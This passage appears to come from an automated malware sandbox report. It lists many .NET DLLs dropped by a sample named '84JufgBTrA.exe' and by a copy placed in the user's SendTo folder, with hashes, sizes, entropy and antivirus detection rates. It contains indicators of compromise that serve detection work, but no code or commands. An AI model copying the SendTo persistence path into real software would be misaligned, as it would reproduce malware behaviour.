                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34816
                                          Entropy (8bit):5.636032516496583
                                          Encrypted:false
                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                          MD5:996BD447A16F0A20F238A611484AFE86
                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38912
                                          Entropy (8bit):5.679286635687991
                                          Encrypted:false
                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):64000
                                          Entropy (8bit):5.857602289000348
                                          Encrypted:false
                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):70144
                                          Entropy (8bit):5.909536568846014
                                          Encrypted:false
                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):50176
                                          Entropy (8bit):5.723168999026349
                                          Encrypted:false
                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.570953308352568
                                          Encrypted:false
                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38912
                                          Entropy (8bit):5.679286635687991
                                          Encrypted:false
                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):126976
                                          Entropy (8bit):6.057993947082715
                                          Encrypted:false
                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):23552
                                          Entropy (8bit):5.529329139831718
                                          Encrypted:false
                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):5.932541123129161
                                          Encrypted:false
                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33792
                                          Entropy (8bit):5.541771649974822
                                          Encrypted:false
                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):5.932541123129161
                                          Encrypted:false
                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33792
                                          Entropy (8bit):5.541771649974822
                                          Encrypted:false
                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):23552
                                          Entropy (8bit):5.529329139831718
                                          Encrypted:false
                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24576
                                          Entropy (8bit):5.535426842040921
                                          Encrypted:false
                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):5.645950918301459
                                          Encrypted:false
                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):342528
                                          Entropy (8bit):6.170134230759619
                                          Encrypted:false
                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34816
                                          Entropy (8bit):5.636032516496583
                                          Encrypted:false
                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                          MD5:996BD447A16F0A20F238A611484AFE86
                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):40448
                                          Entropy (8bit):5.7028690200758465
                                          Encrypted:false
                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):46592
                                          Entropy (8bit):5.870612048031897
                                          Encrypted:false
                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36352
                                          Entropy (8bit):5.668291349855899
                                          Encrypted:false
                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):342528
                                          Entropy (8bit):6.170134230759619
                                          Encrypted:false
                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):5.645950918301459
                                          Encrypted:false
                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.660491370279985
                                          Encrypted:false
                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                          MD5:240E98D38E0B679F055470167D247022
                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):40448
                                          Entropy (8bit):5.7028690200758465
                                          Encrypted:false
                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):294912
                                          Entropy (8bit):6.010605469502259
                                          Encrypted:false
                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.629584586954759
                                          Encrypted:false
                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):64000
                                          Entropy (8bit):5.857602289000348
                                          Encrypted:false
                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.629584586954759
                                          Encrypted:false
                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):126976
                                          Entropy (8bit):6.057993947082715
                                          Encrypted:false
                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):55
